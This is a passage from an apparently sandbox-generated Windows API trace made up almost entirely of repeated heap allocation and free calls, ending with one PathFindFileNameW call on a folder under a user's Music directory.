Size=0x50) returned 0x2ccac38 [0199.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.237] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\") returned="mXrqWFqcp\\" [0199.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f348 [0199.238] HeapFree (in: hHeap=0x620000, 